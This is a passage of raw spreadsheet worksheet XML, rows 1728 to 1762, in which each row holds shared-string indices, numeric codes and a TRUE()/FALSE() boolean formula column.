        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1728" t="s">
        <v>2064</v>
      </c>
      <c r="K1728">
        <v>0</v>
      </c>
      <c r="L1728" t="s">
        <v>98</v>
      </c>
      <c r="R1728" t="s">
        <v>5</v>
      </c>
      <c r="S1728" t="s">
        <v>1229</v>
      </c>
      <c r="T1728" t="s">
        <v>7</v>
      </c>
      <c r="U1728" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1729" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1729" s="1">
        <v>18097</v>
      </c>
      <c r="B1729" t="s">
        <v>0</v>
      </c>
      <c r="C1729" t="s">
        <v>78</v>
      </c>
      <c r="D1729" t="s">
        <v>1826</v>
      </c>
      <c r="E1729" t="s">
        <v>1227</v>
      </c>
      <c r="F1729">
        <v>29117301</v>
      </c>
      <c r="G1729" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1729" t="s">
        <v>2065</v>
      </c>
      <c r="K1729">
        <v>0</v>
      </c>
      <c r="L1729" t="s">
        <v>98</v>
      </c>
      <c r="R1729" t="s">
        <v>5</v>
      </c>
      <c r="S1729" t="s">
        <v>1229</v>
      </c>
      <c r="T1729" t="s">
        <v>7</v>
      </c>
      <c r="U1729" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1730" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1730" s="1">
        <v>18098</v>
      </c>
      <c r="B1730" t="s">
        <v>0</v>
      </c>
      <c r="C1730" t="s">
        <v>78</v>
      </c>
      <c r="D1730" t="s">
        <v>1826</v>
      </c>
      <c r="E1730" t="s">
        <v>1227</v>
      </c>
      <c r="F1730">
        <v>29117301</v>
      </c>
      <c r="G1730" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1730" t="s">
        <v>2066</v>
      </c>
      <c r="K1730">
        <v>0</v>
      </c>
      <c r="L1730" t="s">
        <v>98</v>
      </c>
      <c r="R1730" t="s">
        <v>5</v>
      </c>
      <c r="S1730" t="s">
        <v>1229</v>
      </c>
      <c r="T1730" t="s">
        <v>7</v>
      </c>
      <c r="U1730" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1731" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1731" s="1">
        <v>18099</v>
      </c>
      <c r="B1731" t="s">
        <v>0</v>
      </c>
      <c r="C1731" t="s">
        <v>78</v>
      </c>
      <c r="D1731" t="s">
        <v>1826</v>
      </c>
      <c r="E1731" t="s">
        <v>1227</v>
      </c>
      <c r="F1731">
        <v>29117301</v>
      </c>
      <c r="G1731" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1731" t="s">
        <v>2067</v>
      </c>
      <c r="K1731">
        <v>0</v>
      </c>
      <c r="L1731" t="s">
        <v>98</v>
      </c>
      <c r="R1731" t="s">
        <v>5</v>
      </c>
      <c r="S1731" t="s">
        <v>1229</v>
      </c>
      <c r="T1731" t="s">
        <v>7</v>
      </c>
      <c r="U1731" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1732" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1732" s="1">
        <v>18100</v>
      </c>
      <c r="B1732" t="s">
        <v>0</v>
      </c>
      <c r="C1732" t="s">
        <v>1</v>
      </c>
      <c r="D1732" t="s">
        <v>1826</v>
      </c>
      <c r="E1732" t="s">
        <v>1227</v>
      </c>
      <c r="F1732">
        <v>29117301</v>
      </c>
      <c r="G1732" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1732" t="s">
        <v>2068</v>
      </c>
      <c r="K1732">
        <v>0</v>
      </c>
      <c r="L1732" t="s">
        <v>98</v>
      </c>
      <c r="R1732" t="s">
        <v>5</v>
      </c>
      <c r="S1732" t="s">
        <v>1229</v>
      </c>
      <c r="T1732" t="s">
        <v>7</v>
      </c>
      <c r="U1732" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1733" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1733" s="1">
        <v>18101</v>
      </c>
      <c r="B1733" t="s">
        <v>0</v>
      </c>
      <c r="C1733" t="s">
        <v>78</v>
      </c>
      <c r="D1733" t="s">
        <v>1826</v>
      </c>
      <c r="E1733" t="s">
        <v>1227</v>
      </c>
      <c r="F1733">
        <v>29117301</v>
      </c>
      <c r="G1733" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1733" t="s">
        <v>2069</v>
      </c>
      <c r="K1733">
        <v>0</v>
      </c>
      <c r="L1733" t="s">
        <v>98</v>
      </c>
      <c r="R1733" t="s">
        <v>5</v>
      </c>
      <c r="S1733" t="s">
        <v>1229</v>
      </c>
      <c r="T1733" t="s">
        <v>7</v>
      </c>
      <c r="U1733" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1734" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1734" s="1">
        <v>18102</v>
      </c>
      <c r="B1734" t="s">
        <v>0</v>
      </c>
      <c r="C1734" t="s">
        <v>78</v>
      </c>
      <c r="D1734" t="s">
        <v>2070</v>
      </c>
      <c r="E1734" t="s">
        <v>1227</v>
      </c>
      <c r="F1734">
        <v>10025094</v>
      </c>
      <c r="G1734" t="b">
        <f>FALSE()</f>
        <v>0</v>
      </c>
      <c r="J1734" t="s">
        <v>2071</v>
      </c>
      <c r="K1734">
        <v>0</v>
      </c>
      <c r="L1734" t="s">
        <v>98</v>
      </c>
      <c r="R1734" t="s">
        <v>5</v>
      </c>
      <c r="S1734" t="s">
        <v>1229</v>
      </c>
      <c r="T1734" t="s">
        <v>7</v>
      </c>
      <c r="U1734" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1735" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1735" s="1">
        <v>18103</v>
      </c>
      <c r="B1735" t="s">
        <v>0</v>
      </c>
      <c r="C1735" t="s">
        <v>78</v>
      </c>
      <c r="D1735" t="s">
        <v>1826</v>
      </c>
      <c r="E1735" t="s">
        <v>1227</v>
      </c>
      <c r="F1735">
        <v>29117301</v>
      </c>
      <c r="G1735" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1735" t="s">
        <v>2072</v>
      </c>
      <c r="K1735">
        <v>0</v>
      </c>
      <c r="L1735" t="s">
        <v>98</v>
      </c>
      <c r="R1735" t="s">
        <v>5</v>
      </c>
      <c r="S1735" t="s">
        <v>1229</v>
      </c>
      <c r="T1735" t="s">
        <v>7</v>
      </c>
      <c r="U1735" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1736" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1736" s="1">
        <v>18104</v>
      </c>
      <c r="B1736" t="s">
        <v>0</v>
      </c>
      <c r="C1736" t="s">
        <v>78</v>
      </c>
      <c r="D1736" t="s">
        <v>1826</v>
      </c>
      <c r="E1736" t="s">
        <v>1227</v>
      </c>
      <c r="F1736">
        <v>29117301</v>
      </c>
      <c r="G1736" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1736" t="s">
        <v>2073</v>
      </c>
      <c r="K1736">
        <v>0</v>
      </c>
      <c r="L1736" t="s">
        <v>98</v>
      </c>
      <c r="R1736" t="s">
        <v>5</v>
      </c>
      <c r="S1736" t="s">
        <v>1229</v>
      </c>
      <c r="T1736" t="s">
        <v>7</v>
      </c>
      <c r="U1736" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1737" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1737" s="1">
        <v>18105</v>
      </c>
      <c r="B1737" t="s">
        <v>0</v>
      </c>
      <c r="C1737" t="s">
        <v>78</v>
      </c>
      <c r="D1737" t="s">
        <v>1826</v>
      </c>
      <c r="E1737" t="s">
        <v>1227</v>
      </c>
      <c r="F1737">
        <v>29117301</v>
      </c>
      <c r="G1737" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1737" t="s">
        <v>2074</v>
      </c>
      <c r="K1737">
        <v>0</v>
      </c>
      <c r="L1737" t="s">
        <v>98</v>
      </c>
      <c r="R1737" t="s">
        <v>5</v>
      </c>
      <c r="S1737" t="s">
        <v>1229</v>
      </c>
      <c r="T1737" t="s">
        <v>7</v>
      </c>
      <c r="U1737" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1738" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1738" s="1">
        <v>18106</v>
      </c>
      <c r="B1738" t="s">
        <v>0</v>
      </c>
      <c r="C1738" t="s">
        <v>78</v>
      </c>
      <c r="D1738" t="s">
        <v>1826</v>
      </c>
      <c r="E1738" t="s">
        <v>1227</v>
      </c>
      <c r="F1738">
        <v>29117301</v>
      </c>
      <c r="G1738" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1738" t="s">
        <v>2075</v>
      </c>
      <c r="K1738">
        <v>0</v>
      </c>
      <c r="L1738" t="s">
        <v>98</v>
      </c>
      <c r="R1738" t="s">
        <v>5</v>
      </c>
      <c r="S1738" t="s">
        <v>1229</v>
      </c>
      <c r="T1738" t="s">
        <v>7</v>
      </c>
      <c r="U1738" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1739" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1739" s="1">
        <v>18107</v>
      </c>
      <c r="B1739" t="s">
        <v>0</v>
      </c>
      <c r="C1739" t="s">
        <v>78</v>
      </c>
      <c r="D1739" t="s">
        <v>1826</v>
      </c>
      <c r="E1739" t="s">
        <v>1227</v>
      </c>
      <c r="F1739">
        <v>29117301</v>
      </c>
      <c r="G1739" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1739" t="s">
        <v>2076</v>
      </c>
      <c r="K1739">
        <v>0</v>
      </c>
      <c r="L1739" t="s">
        <v>98</v>
      </c>
      <c r="R1739" t="s">
        <v>5</v>
      </c>
      <c r="S1739" t="s">
        <v>1229</v>
      </c>
      <c r="T1739" t="s">
        <v>7</v>
      </c>
      <c r="U1739" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1740" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1740" s="1">
        <v>18108</v>
      </c>
      <c r="B1740" t="s">
        <v>0</v>
      </c>
      <c r="C1740" t="s">
        <v>1</v>
      </c>
      <c r="D1740" t="s">
        <v>1826</v>
      </c>
      <c r="E1740" t="s">
        <v>1227</v>
      </c>
      <c r="F1740">
        <v>29117301</v>
      </c>
      <c r="G1740" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1740" t="s">
        <v>2077</v>
      </c>
      <c r="K1740">
        <v>0</v>
      </c>
      <c r="L1740" t="s">
        <v>98</v>
      </c>
      <c r="R1740" t="s">
        <v>5</v>
      </c>
      <c r="S1740" t="s">
        <v>1229</v>
      </c>
      <c r="T1740" t="s">
        <v>7</v>
      </c>
      <c r="U1740" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1741" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1741" s="1">
        <v>18109</v>
      </c>
      <c r="B1741" t="s">
        <v>0</v>
      </c>
      <c r="C1741" t="s">
        <v>1</v>
      </c>
      <c r="D1741" t="s">
        <v>1826</v>
      </c>
      <c r="E1741" t="s">
        <v>1227</v>
      </c>
      <c r="F1741">
        <v>29117301</v>
      </c>
      <c r="G1741" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1741" t="s">
        <v>2078</v>
      </c>
      <c r="K1741">
        <v>0</v>
      </c>
      <c r="L1741" t="s">
        <v>98</v>
      </c>
      <c r="R1741" t="s">
        <v>5</v>
      </c>
      <c r="S1741" t="s">
        <v>1229</v>
      </c>
      <c r="T1741" t="s">
        <v>7</v>
      </c>
      <c r="U1741" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1742" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1742" s="1">
        <v>18110</v>
      </c>
      <c r="B1742" t="s">
        <v>0</v>
      </c>
      <c r="C1742" t="s">
        <v>78</v>
      </c>
      <c r="D1742" t="s">
        <v>1826</v>
      </c>
      <c r="E1742" t="s">
        <v>1227</v>
      </c>
      <c r="F1742">
        <v>29117301</v>
      </c>
      <c r="G1742" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1742" t="s">
        <v>2079</v>
      </c>
      <c r="K1742">
        <v>0</v>
      </c>
      <c r="L1742" t="s">
        <v>98</v>
      </c>
      <c r="R1742" t="s">
        <v>5</v>
      </c>
      <c r="S1742" t="s">
        <v>1229</v>
      </c>
      <c r="T1742" t="s">
        <v>7</v>
      </c>
      <c r="U1742" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1743" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1743" s="1">
        <v>18111</v>
      </c>
      <c r="B1743" t="s">
        <v>0</v>
      </c>
      <c r="C1743" t="s">
        <v>78</v>
      </c>
      <c r="D1743" t="s">
        <v>1826</v>
      </c>
      <c r="E1743" t="s">
        <v>1227</v>
      </c>
      <c r="F1743">
        <v>29117301</v>
      </c>
      <c r="G1743" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1743" t="s">
        <v>2080</v>
      </c>
      <c r="K1743">
        <v>0</v>
      </c>
      <c r="L1743" t="s">
        <v>98</v>
      </c>
      <c r="R1743" t="s">
        <v>5</v>
      </c>
      <c r="S1743" t="s">
        <v>1229</v>
      </c>
      <c r="T1743" t="s">
        <v>7</v>
      </c>
      <c r="U1743" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1744" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1744" s="1">
        <v>18112</v>
      </c>
      <c r="B1744" t="s">
        <v>0</v>
      </c>
      <c r="C1744" t="s">
        <v>78</v>
      </c>
      <c r="D1744" t="s">
        <v>1826</v>
      </c>
      <c r="E1744" t="s">
        <v>1227</v>
      </c>
      <c r="F1744">
        <v>29117301</v>
      </c>
      <c r="G1744" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1744" t="s">
        <v>2081</v>
      </c>
      <c r="K1744">
        <v>0</v>
      </c>
      <c r="L1744" t="s">
        <v>98</v>
      </c>
      <c r="R1744" t="s">
        <v>5</v>
      </c>
      <c r="S1744" t="s">
        <v>1229</v>
      </c>
      <c r="T1744" t="s">
        <v>7</v>
      </c>
      <c r="U1744" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1745" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1745" s="1">
        <v>18113</v>
      </c>
      <c r="B1745" t="s">
        <v>0</v>
      </c>
      <c r="C1745" t="s">
        <v>78</v>
      </c>
      <c r="D1745" t="s">
        <v>1826</v>
      </c>
      <c r="E1745" t="s">
        <v>1227</v>
      </c>
      <c r="F1745">
        <v>29117301</v>
      </c>
      <c r="G1745" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1745" t="s">
        <v>2082</v>
      </c>
      <c r="K1745">
        <v>0</v>
      </c>
      <c r="L1745" t="s">
        <v>98</v>
      </c>
      <c r="R1745" t="s">
        <v>5</v>
      </c>
      <c r="S1745" t="s">
        <v>1229</v>
      </c>
      <c r="T1745" t="s">
        <v>7</v>
      </c>
      <c r="U1745" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1746" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1746" s="1">
        <v>18114</v>
      </c>
      <c r="B1746" t="s">
        <v>10</v>
      </c>
      <c r="C1746" t="s">
        <v>57</v>
      </c>
      <c r="D1746" t="s">
        <v>1826</v>
      </c>
      <c r="E1746" t="s">
        <v>1227</v>
      </c>
      <c r="F1746">
        <v>29117301</v>
      </c>
      <c r="G1746" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1746" t="s">
        <v>2083</v>
      </c>
      <c r="K1746">
        <v>0</v>
      </c>
      <c r="L1746" t="s">
        <v>98</v>
      </c>
      <c r="R1746" t="s">
        <v>5</v>
      </c>
      <c r="S1746" t="s">
        <v>1229</v>
      </c>
      <c r="T1746" t="s">
        <v>7</v>
      </c>
      <c r="U1746" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1747" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1747" s="1">
        <v>18115</v>
      </c>
      <c r="B1747" t="s">
        <v>0</v>
      </c>
      <c r="C1747" t="s">
        <v>78</v>
      </c>
      <c r="D1747" t="s">
        <v>1826</v>
      </c>
      <c r="E1747" t="s">
        <v>1227</v>
      </c>
      <c r="F1747">
        <v>29117301</v>
      </c>
      <c r="G1747" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1747" t="s">
        <v>2084</v>
      </c>
      <c r="K1747">
        <v>0</v>
      </c>
      <c r="L1747" t="s">
        <v>98</v>
      </c>
      <c r="R1747" t="s">
        <v>5</v>
      </c>
      <c r="S1747" t="s">
        <v>1229</v>
      </c>
      <c r="T1747" t="s">
        <v>7</v>
      </c>
      <c r="U1747" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1748" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1748" s="1">
        <v>18116</v>
      </c>
      <c r="B1748" t="s">
        <v>0</v>
      </c>
      <c r="C1748" t="s">
        <v>78</v>
      </c>
      <c r="D1748" t="s">
        <v>1826</v>
      </c>
      <c r="E1748" t="s">
        <v>1227</v>
      </c>
      <c r="F1748">
        <v>29117301</v>
      </c>
      <c r="G1748" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1748" t="s">
        <v>2085</v>
      </c>
      <c r="K1748">
        <v>0</v>
      </c>
      <c r="L1748" t="s">
        <v>98</v>
      </c>
      <c r="R1748" t="s">
        <v>5</v>
      </c>
      <c r="S1748" t="s">
        <v>1229</v>
      </c>
      <c r="T1748" t="s">
        <v>7</v>
      </c>
      <c r="U1748" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1749" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1749" s="1">
        <v>18117</v>
      </c>
      <c r="B1749" t="s">
        <v>0</v>
      </c>
      <c r="C1749" t="s">
        <v>78</v>
      </c>
      <c r="D1749" t="s">
        <v>1826</v>
      </c>
      <c r="E1749" t="s">
        <v>1227</v>
      </c>
      <c r="F1749">
        <v>29117301</v>
      </c>
      <c r="G1749" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1749" t="s">
        <v>2086</v>
      </c>
      <c r="K1749">
        <v>0</v>
      </c>
      <c r="L1749" t="s">
        <v>98</v>
      </c>
      <c r="R1749" t="s">
        <v>5</v>
      </c>
      <c r="S1749" t="s">
        <v>1229</v>
      </c>
      <c r="T1749" t="s">
        <v>7</v>
      </c>
      <c r="U1749" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1750" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1750" s="1">
        <v>18118</v>
      </c>
      <c r="B1750" t="s">
        <v>0</v>
      </c>
      <c r="C1750" t="s">
        <v>78</v>
      </c>
      <c r="D1750" t="s">
        <v>1826</v>
      </c>
      <c r="E1750" t="s">
        <v>1227</v>
      </c>
      <c r="F1750">
        <v>29117301</v>
      </c>
      <c r="G1750" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1750" t="s">
        <v>2087</v>
      </c>
      <c r="K1750">
        <v>0</v>
      </c>
      <c r="L1750" t="s">
        <v>98</v>
      </c>
      <c r="R1750" t="s">
        <v>5</v>
      </c>
      <c r="S1750" t="s">
        <v>1229</v>
      </c>
      <c r="T1750" t="s">
        <v>7</v>
      </c>
      <c r="U1750" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1751" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1751" s="1">
        <v>18119</v>
      </c>
      <c r="B1751" t="s">
        <v>0</v>
      </c>
      <c r="C1751" t="s">
        <v>78</v>
      </c>
      <c r="D1751" t="s">
        <v>1826</v>
      </c>
      <c r="E1751" t="s">
        <v>1227</v>
      </c>
      <c r="F1751">
        <v>29117301</v>
      </c>
      <c r="G1751" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1751" t="s">
        <v>2088</v>
      </c>
      <c r="K1751">
        <v>0</v>
      </c>
      <c r="L1751" t="s">
        <v>98</v>
      </c>
      <c r="R1751" t="s">
        <v>5</v>
      </c>
      <c r="S1751" t="s">
        <v>1229</v>
      </c>
      <c r="T1751" t="s">
        <v>7</v>
      </c>
      <c r="U1751" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1752" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1752" s="1">
        <v>18120</v>
      </c>
      <c r="B1752" t="s">
        <v>0</v>
      </c>
      <c r="C1752" t="s">
        <v>78</v>
      </c>
      <c r="D1752" t="s">
        <v>1826</v>
      </c>
      <c r="E1752" t="s">
        <v>1227</v>
      </c>
      <c r="F1752">
        <v>29117301</v>
      </c>
      <c r="G1752" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1752" t="s">
        <v>2089</v>
      </c>
      <c r="K1752">
        <v>0</v>
      </c>
      <c r="L1752" t="s">
        <v>98</v>
      </c>
      <c r="R1752" t="s">
        <v>5</v>
      </c>
      <c r="S1752" t="s">
        <v>1229</v>
      </c>
      <c r="T1752" t="s">
        <v>7</v>
      </c>
      <c r="U1752" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1753" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1753" s="1">
        <v>18121</v>
      </c>
      <c r="B1753" t="s">
        <v>0</v>
      </c>
      <c r="C1753" t="s">
        <v>78</v>
      </c>
      <c r="D1753" t="s">
        <v>1826</v>
      </c>
      <c r="E1753" t="s">
        <v>1227</v>
      </c>
      <c r="F1753">
        <v>29117301</v>
      </c>
      <c r="G1753" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1753" t="s">
        <v>2090</v>
      </c>
      <c r="K1753">
        <v>0</v>
      </c>
      <c r="L1753" t="s">
        <v>98</v>
      </c>
      <c r="R1753" t="s">
        <v>5</v>
      </c>
      <c r="S1753" t="s">
        <v>1229</v>
      </c>
      <c r="T1753" t="s">
        <v>7</v>
      </c>
      <c r="U1753" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1754" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1754" s="1">
        <v>18122</v>
      </c>
      <c r="B1754" t="s">
        <v>0</v>
      </c>
      <c r="C1754" t="s">
        <v>78</v>
      </c>
      <c r="D1754" t="s">
        <v>1826</v>
      </c>
      <c r="E1754" t="s">
        <v>1227</v>
      </c>
      <c r="F1754">
        <v>29117301</v>
      </c>
      <c r="G1754" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1754" t="s">
        <v>2091</v>
      </c>
      <c r="K1754">
        <v>0</v>
      </c>
      <c r="L1754" t="s">
        <v>98</v>
      </c>
      <c r="R1754" t="s">
        <v>5</v>
      </c>
      <c r="S1754" t="s">
        <v>1229</v>
      </c>
      <c r="T1754" t="s">
        <v>7</v>
      </c>
      <c r="U1754" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1755" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1755" s="1">
        <v>18123</v>
      </c>
      <c r="B1755" t="s">
        <v>0</v>
      </c>
      <c r="C1755" t="s">
        <v>78</v>
      </c>
      <c r="D1755" t="s">
        <v>1826</v>
      </c>
      <c r="E1755" t="s">
        <v>1227</v>
      </c>
      <c r="F1755">
        <v>29117301</v>
      </c>
      <c r="G1755" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1755" t="s">
        <v>2092</v>
      </c>
      <c r="K1755">
        <v>0</v>
      </c>
      <c r="L1755" t="s">
        <v>98</v>
      </c>
      <c r="R1755" t="s">
        <v>5</v>
      </c>
      <c r="S1755" t="s">
        <v>1229</v>
      </c>
      <c r="T1755" t="s">
        <v>7</v>
      </c>
      <c r="U1755" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1756" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1756" s="1">
        <v>18124</v>
      </c>
      <c r="B1756" t="s">
        <v>0</v>
      </c>
      <c r="C1756" t="s">
        <v>78</v>
      </c>
      <c r="D1756" t="s">
        <v>1826</v>
      </c>
      <c r="E1756" t="s">
        <v>1227</v>
      </c>
      <c r="F1756">
        <v>29117301</v>
      </c>
      <c r="G1756" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1756" t="s">
        <v>2093</v>
      </c>
      <c r="K1756">
        <v>0</v>
      </c>
      <c r="L1756" t="s">
        <v>98</v>
      </c>
      <c r="R1756" t="s">
        <v>5</v>
      </c>
      <c r="S1756" t="s">
        <v>1229</v>
      </c>
      <c r="T1756" t="s">
        <v>7</v>
      </c>
      <c r="U1756" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1757" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1757" s="1">
        <v>18125</v>
      </c>
      <c r="B1757" t="s">
        <v>0</v>
      </c>
      <c r="C1757" t="s">
        <v>1</v>
      </c>
      <c r="D1757" t="s">
        <v>1826</v>
      </c>
      <c r="E1757" t="s">
        <v>1227</v>
      </c>
      <c r="F1757">
        <v>29117301</v>
      </c>
      <c r="G1757" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1757" t="s">
        <v>2094</v>
      </c>
      <c r="K1757">
        <v>0</v>
      </c>
      <c r="L1757" t="s">
        <v>98</v>
      </c>
      <c r="R1757" t="s">
        <v>5</v>
      </c>
      <c r="S1757" t="s">
        <v>1229</v>
      </c>
      <c r="T1757" t="s">
        <v>7</v>
      </c>
      <c r="U1757" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1758" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1758" s="1">
        <v>18126</v>
      </c>
      <c r="B1758" t="s">
        <v>0</v>
      </c>
      <c r="C1758" t="s">
        <v>78</v>
      </c>
      <c r="D1758" t="s">
        <v>1826</v>
      </c>
      <c r="E1758" t="s">
        <v>1227</v>
      </c>
      <c r="F1758">
        <v>29117301</v>
      </c>
      <c r="G1758" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1758" t="s">
        <v>2095</v>
      </c>
      <c r="K1758">
        <v>0</v>
      </c>
      <c r="L1758" t="s">
        <v>98</v>
      </c>
      <c r="R1758" t="s">
        <v>5</v>
      </c>
      <c r="S1758" t="s">
        <v>1229</v>
      </c>
      <c r="T1758" t="s">
        <v>7</v>
      </c>
      <c r="U1758" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1759" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1759" s="1">
        <v>18127</v>
      </c>
      <c r="B1759" t="s">
        <v>0</v>
      </c>
      <c r="C1759" t="s">
        <v>78</v>
      </c>
      <c r="D1759" t="s">
        <v>1826</v>
      </c>
      <c r="E1759" t="s">
        <v>1227</v>
      </c>
      <c r="F1759">
        <v>29117301</v>
      </c>
      <c r="G1759" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1759" t="s">
        <v>2096</v>
      </c>
      <c r="K1759">
        <v>0</v>
      </c>
      <c r="L1759" t="s">
        <v>98</v>
      </c>
      <c r="R1759" t="s">
        <v>5</v>
      </c>
      <c r="S1759" t="s">
        <v>1229</v>
      </c>
      <c r="T1759" t="s">
        <v>7</v>
      </c>
      <c r="U1759" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1760" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1760" s="1">
        <v>18128</v>
      </c>
      <c r="B1760" t="s">
        <v>0</v>
      </c>
      <c r="C1760" t="s">
        <v>78</v>
      </c>
      <c r="D1760" t="s">
        <v>2097</v>
      </c>
      <c r="E1760" t="s">
        <v>1227</v>
      </c>
      <c r="F1760">
        <v>29117300</v>
      </c>
      <c r="G1760" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1760" t="s">
        <v>2098</v>
      </c>
      <c r="K1760">
        <v>0</v>
      </c>
      <c r="L1760" t="s">
        <v>98</v>
      </c>
      <c r="R1760" t="s">
        <v>5</v>
      </c>
      <c r="S1760" t="s">
        <v>1229</v>
      </c>
      <c r="T1760" t="s">
        <v>7</v>
      </c>
      <c r="U1760" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1761" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1761" s="1">
        <v>18129</v>
      </c>
      <c r="B1761" t="s">
        <v>0</v>
      </c>
      <c r="C1761" t="s">
        <v>78</v>
      </c>
      <c r="D1761" t="s">
        <v>2097</v>
      </c>
      <c r="E1761" t="s">
        <v>1227</v>
      </c>
      <c r="F1761">
        <v>29117300</v>
      </c>
      <c r="G1761" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1761" t="s">
        <v>2099</v>
      </c>
      <c r="K1761">
        <v>0</v>
      </c>
      <c r="L1761" t="s">
        <v>98</v>
      </c>
      <c r="R1761" t="s">
        <v>5</v>
      </c>
      <c r="S1761" t="s">
        <v>1229</v>
      </c>
      <c r="T1761" t="s">
        <v>7</v>
      </c>
      <c r="U1761" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1762" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1762" s="1">
        <v>18130</v>
      </c>
      <c r="B1762" t="s">
        <v>0</v>
      </c>
      <c r="C1762" t="s">
        <v>78</v>
      </c>
      <c r="D1762" t="s">
        <v>2097</v>
      </c>
      <c r="E1762" t="s">
        <v>1227</v>
      </c>
      <c r="F1762">
        <v>29117300</v>
      </c>
      <c r="G1762" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
